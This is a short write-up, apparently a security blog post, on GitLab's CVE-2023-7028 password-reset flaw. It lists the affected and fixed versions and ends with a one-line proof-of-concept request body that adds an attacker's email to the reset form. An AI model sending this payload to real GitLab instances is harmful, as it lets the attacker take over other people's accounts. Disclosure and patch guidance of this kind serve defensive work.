Account Takeover via password reset without user interactions (CVE-2023–7028)
GitLab has released security updates to address two critical vulnerabilities, including one that could be exploited to take over accounts without requiring any user interaction.
Tracked as CVE-2023–7028, the flaw has been awarded the maximum severity of 10.0 on the CVSS scoring system and could facilitate account takeover by sending password reset emails to an unverified email address.
The DevSecOps platform said the vulnerability is the result of a bug in the email verification process, which allowed users to reset their password through a secondary email address.
t affects all self-managed instances of GitLab Community Edition (CE) and Enterprise Edition (EE) using the below versions -
- 16.1 prior to 16.1.6
- 16.2 prior to 16.2.9
- 16.3 prior to 16.3.7
- 16.4 prior to 16.4.5
- 16.5 prior to 16.5.6
- 16.6 prior to 16.6.4
- 16.7 prior to 16.7.2
GitLab said it addressed the issue in GitLab versions 16.5.6, 16.6.4, and 16.7.2, in addition to backporting the fix to versions 16.1.6, 16.2.9, 16.3.7, and 16.4.5. The company further noted the bug was introduced in 16.1.0 on May 1, 2023.
GitLab CVE-2023–7028 POC
user[email][]=valid@email.com&user[email][]=attacker@email.com
References:
https://securityonline.info/cve-2023-7028-cve-2023-5356-gitlab-critical-flaws/